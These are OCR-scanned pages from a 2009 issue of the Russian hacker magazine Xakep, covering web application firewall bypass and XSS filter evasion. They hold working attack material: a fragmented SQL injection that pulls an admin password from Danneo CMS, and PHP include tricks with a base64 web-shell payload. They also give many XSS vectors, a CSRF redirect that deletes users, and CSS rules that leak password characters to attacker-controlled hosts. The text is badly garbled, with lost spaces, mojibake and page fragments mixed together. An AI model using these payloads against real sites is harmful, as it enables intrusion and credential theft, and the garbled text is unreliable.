книги хакеры / журнал хакер / 130_Optimized

XSS ВGOOGLE CHROME

нулл-байту функции eregi(), поэтому для обхода проверки достаточно вставить в начале параметра %00. Даже при включенной директиве PHP magic_quotes_gpc нулл-байт не будет экранироваться, так как присутствует такой код:

if(!ini_get("register_globals") || (@get_cfg_var('register_globals')==1)) { @extract($_COOKIE,EXTR_SKIP); @extract($_POST,EXTR_SKIP); @extract($_GET,EXTR_SKIP); @extract($_REQUEST,EXTR_SKIP);

/* ... */ if(get_magic_quotes_gpc()) {

if($_POST) $_POST = stripslashesall($_ POST);

if($_GET) $_GET = stripslashesall($_GET); if($_REQUEST) $_REQUEST =

stripslashesall($_REQUEST); if($_COOKIE) $_COOKIE =

stripslashesall($_COOKIE);

}

Здесь важно отметить, что все данные, полученные напрямую из суперглобальных массивов ($_GET, $_POST, $_COOKIE, $_REQUEST), будут очищены от экранирующих символов, в то время как переменные, ранее введенные в локальное пространство из тех же массивов функцией extract(), останутся как есть. Уже на этом этапе видна несогласованность кода. Сама же SQL-инъекция находится в модуле голосований при добавлении комментариев:

$comtext=($setting['peditor']=="yes") ? commentparse($comtext) : deltags(commentparse($comtext));

$comname = (preparse($usermain['logged'],T HIS_INT)==1 && preparse($usermain['userid' ],THIS_INT)>0) ? $usermain['uname'] : subs tr(deltags($comname),0,50); $comtitle=substr(deltags($comtitle),0,255); $in=$db->query("INSERT INTO "

.$basepref."_polling_comment VALUES (NULL,'".$id."','".$usermain ['userid']."','".NEWTIME."', '$comname', '$comtitle','$comtext','".REMOTE_ ADDRS."')");

Уязвимость возникает после того, как значение пере-

менной comtitle обрезается функцией substr() до 255 символов. Ошибка разработчиков состоит в том, что данные сперва экранируются и только потом приводятся к требуемой длине, хотя должно быть наоборот. Это дает возможность проведения фрагментированной SQL-инъекции, несмотря на экранирование входящих данных при magic_quotes_gpc=on.

Для проведения успешной атаки необходимы следующие значения параметров:

•comname — a-z значение от 5 символов до 10;

•comtitle — 254 символа + кавычка;

•comtext — /*%00*/, (SELECT adpwd FROM dn052_admin LIMIT 1), 1)-- -

Последним символом в значении переменной comtitle будет обратный слэш, который экранирует следующую за ним кавычку, что позволит выполнить код в переменной comtext. В итоге, получится SQL-запрос:

INSERT INTO dn052_polling_comment VALUES (NULL,'1','0','1230987393', 'antichat','a[252x]b\','/*\0*/, (SELECT adpwd FROM dn052_admin LIMIT 1), 1)-- -','127.0.0.1')

При просмотре страницы с комментариями в поле текста сообщения будет отображен пароль администратора.

СЛЕПЫЕ SQL-ИНЪЕКЦИИ

При проведении слепых SQL-инъекций грамотный WAF

— серьезное препятствие. Однако получить информацию из базы данных все же возможно при использовании альтернативных имен операторов и конструкций синтаксиса. Например, для MySQL применимы такие варианты:

В ситуациях, когда производится фильтрация по наличию того или иного символа в параметре, также есть свои альтернативы в зависимости от RDBS.

dvd

•Всематериалывыступлений, инструменты, упомянутые встатье, атакже подборкабесплатных WAF доступнына диске.

•Демонстрациюуяз-

вимостивDanneo CMS

смотринаDVD.

HTTP://WWW

links

•www.webappsec. org — Web Application Security Consortium (WASC).

•ru.wikipedia.org/ wiki/Сетевая_модель_OSI.

•xiom.com — ресурс,

посвященныйисключительноWAF.

•code.google.com/p/ waffit — проект wafw00f.

•w3af.sourceforge.net

— фреймворкw3af.

•www.netnea.com/ cms/?q=remo — GUI-

редакторправил

Remo.

ВИЗУАЛЬНОЕСОЗДАНИЕПРАВИЛ ДЛЯMOD_SECURITY ВREMO

С проблемой легко справляются следующие возможности PHP:

- Доступ по FTP:

/?inc=ftp://attacker/s.txt

Причем функция file_exists() вернет true. - Доступ к необработанным POST-данным

(только при allow_url_include=on):

POST /?inc=php://input HTTP/1.0

Host: localhost

Content-type: text/plain

Content-Length: 10

Connection: close

phpinfo();

- Использование враппера data (allow_url_ include=on):

/?inc=data:;base64,PD9waHAgc3lzdGV

tKCRfR0VUW2NdKTsgPz4=&c=dir

- А также compress.

zlib://, php://filter, ogg:// è äð.

ЗАКЛЮЧЕНИЕ

РазвитиеWebApplicationFirewallнестоитнаместе.

Вместестемпоявляютсявсеновыеметодыобхода различныхограничений.Будьтопростенькийфильтр наPHPилижемогучийWAF—придетальномрассмо- трениииупорноманализеубеждаешься,чтоничтоне лишенослабыхмест.Когдаэксплуатированиеуязви- мости,обнаруженнойвкаком-либовеб-приложении, становитсязатруднительнымввиду,казалосьбы, непреступнойзащитыWAF,нестоитбросатьначатое дело.Нужнолишьвникнутьвтонкостиработысистемы,итогдаверныйпутьстанеточевидным.z

XÀÊÅÐ 10 /130/ 09

СХЕМАОБХОДАFIREWALL

СПОМОЩЬЮXSS. БЛИЗКОКСЕРДЦУ НЕПРИНИМАТЬ

СКАЗКИ XSSАХИРИЗАДЫ

HTML-ТРЮКИСОЗНАМЕНИТОЙ ПРЕЗЕНТАЦИИНАТЕМУXSS C BLACKHAT 2009

ЭтивариантыпроверяюподIE 7. Какпотомоказалось, второйещеиобходитвстроенныйфильтр XSS IE8. Наулицестоитболеечемхорошая погодадляавгустовскогоПитера, — поэтомуна большееменянехватает. Вечеромследующего днявыясняется, чтомоипопыткибылисамыми плодотворными. Этотфактменянеперестает удивлятьдосихпор, иименноонявляетсяосновойпричинойнаписаниястатьи.

7 СЕНТЯБРЯ, 01:00, МОСКВА

Немногоотойдяотпроизошедшегоиполучив внаградуHTC-шкуот«Битрикс», японял, что менягложетинтереснайтиещечто-нибудьв пресловутомWAF (затративнапоискине40 минут, ахотябыполторачаса). Кэтомувремени фильтружезалатали, style теперьнепропускаетниввидетэга, ниввидеатрибута. Фокусс escape-кодированиемтоженепроходит, равно каки\. Спокойночитаюспецификацию набраузерыинахожуприятнуювозможность использоватьbehavior подIE, которойтакине сумелвоспользоватьсянаСС09 ввидуотсутс-

твиялокальногофайланужногоконтента:

<P STYLE="b\eh\a\v\i& #92o\r:url('#default#time2')"

MSDN — КЛАДЕЗЬЗНАНИЙ. ЕСЛИ НАДОНАЙТИНЕФИЛЬТРУЕМЫЙ EVENT — ТЕБЕСЮДА

ОНЛАЙН-СЕРВИСJJ-ENCODE ДЛЯ ПРИДАНИЯJAVASCRIPT ЗАКОН-

ЧЕННОГОВИДА:)

onEnd="alert('ONSEC.ru russian security team')">

Вмоейверсиифильтраонауженеработает, нонаконкурсебылабыкакразвтему. Затем нашласьещеоднанефильтруемаяXSS:

<MARQUEE BEHAVIOR="alternate" onbounce="alert('ONSEC.ru')">xss </MARQUEE>

èëè

<MARQUEE onstart="alert('ONSEC. ru')">xss</MARQUEE>

ВотличиеотbehaviorтакоеработаетивIE8,ив FF3.5.Послеэтогоот«несистемного»подходак поискууязвимостейяотказываюсь.Формализую задачупоискавозможныхXSSдопоисканефильтруемыхтэгов,атрибутовизначенийатрибутов.

АТРИБУТЫ

Сточкизренияхакеранаиболееинтересныатрибутысобытий(Events), потомучтоэтопрямой способквыполнениюJavaScript-кодабезтэга <script>. Болеетого, длябраузеровсовершенноэквивалентыследующиеварианты:

<a href="" onMouseMove="alert(1)"> <a href="" onMouseMove=”javascript: alert(1)">

<a href="

onMouseMove="xakep:alert(1)"> <a href="" onMouseMove="nonxss:alert(1)">

ЭтоточноработаетивIE 8, Opera 10.00, Firefox 3.5, Safari, Chrome. Какдумаешь, всефильтры имеютправильныерегулярныевыражения подтакиестроки? Большинстводействительноимеют, поэтомупростонамотаемнауси двинемсядальше.

Уатрибутовсобытийтринедостатка:

1.Вызовпроисходитпослечего-то, иэто«чтото» частотребуеткаких-тодействийсостороны пользователя.

2.Всеатрибутысобытийначинаютсяна

«on», — чтотеоретическипозволяетнаписать регулярноевыраженияподнихвсех.

3.Обычноониприменимытолькокопределеннымтэгам.

Расстраиватьсятутнезачем— ещениодин фильтрнеимеетрегулярноговыраженияпод всесобытиясразу. Связаноэто, преждевсего, сложнымисрабатываниями, нообэтомпозже. Такчто— фильтруютсяобычноконкретные события, итутиз-засобственнойленипро- граммистызабываютпрочитатьспецификации браузеровилихотябыMSDN, ограничиваясь

двумя-тремя, влучшемслучаедесятьюсобытиями. Асколькоихнасамомделе? Наэтотвопрося тожехотелбызнатьответ, нодляегополучения требуется, какминимум, собратьвместевсе версиивсехсуществующихбраузеровирасковырятьих, потомучтовдокументациитожене всегдавсеописано. Нижеяприведунаиболее полныйсписок, которыйсобиралпокрупицам:

Onabort; onactivate; onafterprint; onafterupdate; onbeforeactivate; onbeforecopy; onbeforecut; onbeforedeactivate; onbeforeeditfocus; onbeforepaste; onbeforeprint; onbeforeunload; onbeforeupdate; onblur; onbounce; oncellchange; onchange;

onclick; oncontextmenu; oncontrolselect; oncopy; oncut; ondataavailable; ondatasetchanged; ondatasetcomplete; ondblclick; ondeactivate; ondrag; ondragdrop; ondragend; ondragenter; ondragleave; ondragover; ondragstart; ondrop; onerror; onerrorupdate; onfilterchange; onfinish; onfocus;

onfocusin; onfocusout; onhashchange; onhelp;

onkeydown; onkeypress; onkeyup; onlayoutcomplete; onload;

onlosecapture; onmessage; onmousedown; onmouseenter; onmousemove; onmouseout; onmouseover; onmouseup; onmove; onmoveend; onmovestart; onoffline; ononline;

onpage; onpaste; onprogress; onpropertychange; onreadystatechange; onreset; onresize; onresizeend; onresizestart; onrowenter; onrowexit; onrowsdelete; onrowsinserted; onscroll; onselect; onselectionchange; onselectstart; onstart; onstop;

onstorage; onstoragecommit; onsubmit; ontimeerror; ontimeout; onunload;

onend; onMediaComplete; onMediaError; onOutOfSync; onPause; onRepeat;

onResume; onReverse; onSeek; onSynchRestored; onTrackChange; onURLFlip.

Нучто, несколькобольшечемтыожидал? Это ещедаженевесьсписоктого, чтоясобрал, не-

info

Внимание! Информацияпредставлена исключительно сцельюознаком-

ления! Ниавтор, ни редакциязатвои действияответственностиненесут!

HTTP://WWW

links

•oxod.ru — мой блог. Пишупомере желания. Ждукомментариев, отвечуна вопросы.

•utf-8.jp/public/ jjencode.html — сер-

виспошифрованию

JavaScript.

•p42.us/favxss/fav. ppt — презентация

XSS filters bypass сBlackHat 2009.

•disenchant.ch/ blog/wp-content/ uploads/2008/05/ xss_presentation.pdf

— довольнобольшая, нонеоченьинтереснаяпрезентацияпо

XSS.

•slideshare.net/ guestdb261a/ csrfrsa2008 jeremiah grossman-

349028 — рекомендую ознакомиться сматериаламина темуCSRF.

ДЕМОНСТРАЦИЯИДЕИCLICKJACKING

которыекускипотерялись;). Потенциальнокаждаястрочка изэтогосписка— XSS-уязвимость. Но, во-первых, невсегда удается«прислонить» еекнужномуатрибуту, аво-вторых, невсегдаудаетсяспровоцироватьнужноедлявыполнения кодадействие. НарядуссобытиямидляXSS-атакимогут использоватьсяидругиеатрибуты. Вотизвестныемне:

codebase dynsrc lowsrc xmlns

seekSegmentTime src

style

Невсеизнихтривиальномогутбытьиспользованы, однако, когдаисследуешьфильтр, незнаешьзаранееничегоинадо собратькакможнобольшенефильтруемыхисключений, чтобыпотомизнихужеготовитьконкретнуюатаку.

ТЕГИ

Предположим, фильтрдаетвозможностьвыводитьна страницусимволы<>, такимобразом, можнопробоватьразличныетеги. Здесьопятьразработчикиоставляютхакерам поледлядействий. Вотсписоктегов, которыепригодятся:

Style

Script

Embed

Object

Applet

Meta

Iframe

Frame

Frameset

Ilayer

Layer

Bgsound

Base

Xml

Import

Link

Html

Img

Яневключаюсюдатотже<MARQUEE>, хотявышесам приводилатакусегопомощью. Делаюэтоумышленно— по тойжелогикеможнобыловключитьсюдавообщевсетеги

ЕСЛИХАКЕРСТАВИТПЕРЕД СОБОЙЦЕЛЬПОЛУЧИТЬ ПОЛЬЗУОТXSS-АТАКИ,ОН СДЕЛАЕТВРЕДОНОСНЫЙ КОДКОМБИНИРОВАННЫМ.

HTML. Такжевэтомспискеестьархаизмывроде<ilayer>, — я даженеберусьсказать, начинаяскакихверсий, популярные браузерыпересталиегоподдерживать. Однаконезабывай: XSS — этоиграсбраузероминенадопренебрегатьлюбой возможностью. Еслихакерставитпередсобойцельполучить пользуотXSS-атаки, онобязательносделаетвредоносныйкодкомбинированным, включитнесколькотеговпод разныеверсииразныхбраузеров. Пригодитсяссылкаwww. browsertests.org, — тамможнонайтирезультатытестированиямногихатрибутовитеговвразличныхбраузерах.

CSRF, ИЛИНЕJAVASCRIPT’ОМ ЕДИНЫМ

КромевыполненияJavaScript (нуилитогожеVBScript) кода, схожиеатакимогутприменятьсядляотправки запросовбезведомапользователя. Ониполучилина-

званиеCross-Site Request Forgery. Самыйтривиаль-

ныйспособ— <img src=http://megasite.ru/

mygetrequest?mygetparam=value>. Приобработке такоготегавнутрилюбойHTML-страницыбраузерпользова- телясразуполезетискатькартинкупоадресу, тоестьотправит тудаHTTP GET запрос. Такимобразом, можно, например, попробоватьотправитьзапроскадминке, еслионатакая небезопасная, чтопринимаетGET. Администраторзаходит настраницуиегобраузерлезетискатькартинку, отправляя запросадминистративномускрипту(разумеется, справиль- нымикукисамиадминистратораиотегоIP-адреса). Если фильтруютсярасширенияилиключевыесловазапроса— не беда. Такая«защита» выеденногояйцанестоит. Согласно спецификацииhttp-протокола, статус3ххговоритоперемещенииконтентаинадопослатьзапроснауказанныйадрес. Создаемскриптimg.php (можноиimg.gif, настроивсвойвебсерверсоответствующимобразом) следующегосодержания:

<?php

header('Location: http://attacked-host/ admin.php?act=delUser&id=1');

die();

?>

—иполучаемровнымсчетомтожесамое. Такимобразом, все, чтопозволяетвставлятьсвоикартинкивсообщения подходитдляатаки. Тутянемноголукавлю, потомучтовебприложениеможетзапроситьбайтытвоего«рисунка» и прогнатьихчерезграфическуюбиблиотеку, напримерLibGD. Тогдатакойспособнепройдет. Впрочем, подобныхвеб-при- ложенийоченьмало. Ноэтоещелегко. ЕслиестьJavaScript

—можноработатьсDOM-объектами, например, отправлять формы. Это, какминимум, даетужеPOST-запрос. Просто создаешьdocument.write нужныеобъектыform, input ивсе остальноегде-нибудьвневидимомdiv, апотомделаешь document.myform.submit(). ЕщеможноотправитьPOST-

запросчерезвстроенныеобъектыwindow.ActiveXObject

дляInternet Explorer иwindow.XMLHttpRequest дляMozilla,

HA.CKERS.ORG — АЗБУКАXSS.

РЕКОМЕНДОВАНОКПЕРЕОСМЫСЛЕНИЮ

XSS, КОТОРАЯОБХОДИТФИЛЬТРАЦИЮБЛАГОДАРЯКОДИРОВКЕ UTF-7. БЫЛАНАЙДЕНА

ВGOOGLE В2005 ГОДУ

Тутязадерживатьсяособонебуду. Возьмина заметку, есличтонепонятно— вСетимного материаловнаэтутему. Яжепродолжуповествованиеименноометодахобходафильтров.

БУДЬСТИЛЬНЫМ! ИСПОЛЬЗОВАНИЕCSS2

ИCSS3 ДЛЯXSS

Преждевсего, упомянузаезженныевещи. Для Internet Explorer существуетспособвыполнять

JavaScript спомощьюфункцииexpression(). В

качествеаргументаейпередаетсясамскрипт. Примерреализации— всамомначалестатьи. ЧутьменеезаезженныйприемдляIE — использованиеbehavior. Проблемавтом, чтоможно подключитьтолькофайл, расположенныйна томжедомене. ВотHTML:

<div style=”behavior: url(“/file. htc”)

Содержимоеподключаемогофайлапримерно следующее:

<attach event="ondocumentready" handler="parseStylesheets" /> <script language="JavaScript"> function parseStylesheets() {

alert(document.cookie + '\nONSEC. ru security research team')

}

</script>

Естьнебольшойположительныймомент— такуюконструкциюможнозасунутьвнутрьдругогоHTML; IE распознаеттамвсе, чтонамнадо

ивыполнит. Такимобразом, естьвозможность использоватьсякакбыдваXSS крядуивызвать какую-нибудьадминистративнуюjavascript- функцию. Сейчасрасскажуболееподробно. Предположим, естьсайтсуязвимостьюXSS

ифильтром, которыйфильтруетscript, но пропускаетbehavior. Длянаглядности, — пусть существуетуязвимостьвадминкеивпоиске, новсевариантыXSS, кромеbehavior, не работают. Предлагаювоттакой«двойной»

вектор: http://xssed-site.com/search/q=<div style="behavior:url(http://xssed-site.com/ admin/q=<attach event="ondocumentready" handler="delUser(1)"/>)>

Тутмыподключаемкстраницепоискастраницуадминки, гдетакжеприсутствуетXSS. При

этомпривязываемфункциюdelUser(1) (еще разповторю, этаненашафункция, афункция

самойадминки) ксобытиюondocumentready.

Всенаодномдомене, итакойкодотработает! Едемдальше. Длядвижкамозиллыесть такаяштуковина, как–moz-binding: url(http:// hackme.com/bindme.xml#xss). Этопозволяет подключитьвнешнийXML, внутрикоторого будетсодержатьсяJavaScript. Вотпример такогоXML-файла:

<bindings xmlns="http:// www.mozilla.org/xbl" xmlns:html="http://www. w3.org/1999/xhtml"> <binding id="xss">

<implementation>

<constructor>

alert("XSS");

</constructor>

</implementation>

</binding>

</bindings>

Естьоднамаленькаязагвоздка— приемне будетработатьвFF3.5. Покончивсособенностямибраузеров, переходимкособенностям

самогоCSS. Начнем, конечно, синклудов. С точностьюдопредставлениякодасинтаксис выглядитвоттак:

<style>

@import "http://xakepsite.com/xss.css" </style>

Ну, аужевнутриэтогобезобразияможноскрыть все, чтоупомянутовыше. Теперьчутьвеселее

— чтениезначенийтеговпосредствомчистого CSS3. Дляпримера, унасимеетсяinput, вкоторыйпользовательвводитпароль. ПрикручиваемCSS ссодержанием:

input[value*="\x10"]{

background:url("//xakepsite.

com/?h=\x10");

}

… и так далее … input[value*=“\x7F”]{ background:url(“//attacker.

com/?h=\x7F”);

}

Чтоэтодает? Каждыйраз, когдасимволпароля попадаетвдиапазон10-7F, отсылаетсясоответствующийзапрос. Такимобразом, повыходу унасбудутвсесимволыпароля. Останется толькорасположитьихвнужномпорядке. В реальнойжизнидиапазонв111 символов можнорасширить, аспомощьюасинхронных включенийCSS восстановитьипоследовательностьсимволов. Тутяостанавливатьсяне буду, примерреализации— eaea.sirdarckcat. net/cssar.

ЭТИДЕВУШКИВЫДАЮТНАГРАДУ ЗАКАЖДУЮНАЙДЕННУЮУЯЗВИМОСТЬВСЕРВИСАХGOOGLE

DATA:TEXT/HTML

Популярныйвпоследнеевремяприемобхода фильтров. Главноепреимущество— поддержка base64-формата. Такимобразом, внутреннее выражениефильтрамподверженозаведомоне будет. Реализации, например, такие:

<iframe src="data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3Njcm lwdD4K"></iframe>

<FRAMESET><FRAME SRC="data:text/htm l;base64,PHNjcmlwdD5hbGVydCgnWFNTJ yk8L3NjcmlwdD4K"></FRAMESET> <OBJECT TYPE="text/x-scriptlet" DATA="data:text/html;base64,PHNjc mlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4 K"></OBJECT>

Такжепрекрасновыполняетсявадресной строкебраузера. Работаетвезде, кромеInternet Explorer. Помимоtext/html можноиспользовать вариациинатему.

«ОБФУСКАЦИЯ» КОДА

Браузерыпо-разномуобрабатываютHTML

— этонидлякогонесекрет. Используятеили иныеособенности, можноприводитьрабочий кодксостоянию, когдаоннепопадаетпод регулярныевыраженияфильтров. Природе известнымногиеварианты, например:

<p/alt="noxss"onmouseover=alert(/

XSS/)>test</p>

РаботаетвOpera 10, IE 8, FF 3.5, нонепонима-

етсяChrome иSafari.

<style>@\69\6d\70\6f\72\74 '// xakep-site.com/xss.css';</style> <p style="f\iltere\d: va\lue"/>

<div style=f\il\te\r\ed:val\ue></div> <div style=xss:\65\78\70\72\65\73\7 3\69\6f\6e\28\61\6c\65\72\74\28\31 \29\29></div>

<div

style=xss:\65\78

\70\72\6

53\73\73\6

9\6f\6e\

28\61\6c

9265\72\74

\28\31\2

57\29></div> <!—xss:expression(alert(1))-->

РаботаетOpera 10, Chrome, Safari, IE 8, FF 3.5 (сам expression, естественно, отрабатываетсятолько IE).Естьпрекраснаяисследовательскаяработа пораспознаваниютеговиатрибутоввInternet Explorer 6. Нотаккаконанемногоустарела, я небудуцитироватьприемыоттуда. Еслибудет желание— найдешьеенаantichat.ru. Предположимтеперьситуацию, чтодоступквыполнениюJavaScript получен, однакофильтрне пропускаетнужныевыражениявродеdocument. cookie, location.href, document.write ипрочее. Тут расстраиватьсянезачем. Покафильтрнеимеет JavaScript-процессора, еговсегдаможнообойти средствамисамогоJavaScript. Напрошедшей BlackHat 2009 былпредставленинтересный способприведениякодакнефильтруемомувиду

— alert(1) заменяетсянаjson-представление:

($=[$=[]][(____=!$+$)[_=-~-~- ~$]+({}+$)[_/_]+($$=($_=!”+$) [_/_]+$_[+$])])()[__[_/_]+__ [_+~$]+$_[_]+$$](_/_)

Ну,как,читаемо?Аглавное—всесимволыпечат- ные.Этотпримеряподробноразобралвсвоейза-

метке:http://oxod.ru/2009/08/26/обход-xss-филь-

тров-по-средствам-особенос.Авотпримерчик

обходафильтрацииdocument.cookieотменя:

($=("+([] ['pop']))+");(_="+this);$$$

= _[11]+$[6]+$[3]+$[1]+' m'+$[20]+$[2]+$[4];$$_ =

$[3]+$[6]+$[6]+"k”+$[5]+$[20]; alert(this[$$$][$$_])

Тутидеявтом, что, приводятипыизначенияпеременныхкстрокам, мыполучаемиз нихнужныесимволыдлясоставленияслов document иcookie. Естественно, ниодин фильтрнесправитсястакойзадачей, неимея возможностисамомувыполнятьJavaScript.

ЗАКЛЮЧЕНИЕ

ХотелзаостритьвниманиеименнонаXSSфильтрах, которыевпоследнеевремявсечаще появляютсянавеб-серверах. Принаписании фильтровоченьважнопойматьграньмеждунеобходимымиизлишним. Иобязательно— проверитьфильтрналожныесрабатывания, чтобы потомнепришлосьразбиратьсяснегодующими пользователями. Теперьсталоочевидно, что отделатьсядесятьюрегулярнымивыражениями невыйдет. Вотвродебыивсе, призываюписать хорошиепродуктыиисследоватьихсэнтузиазмом. Навопросыотвечаювблогеoxod.ru. z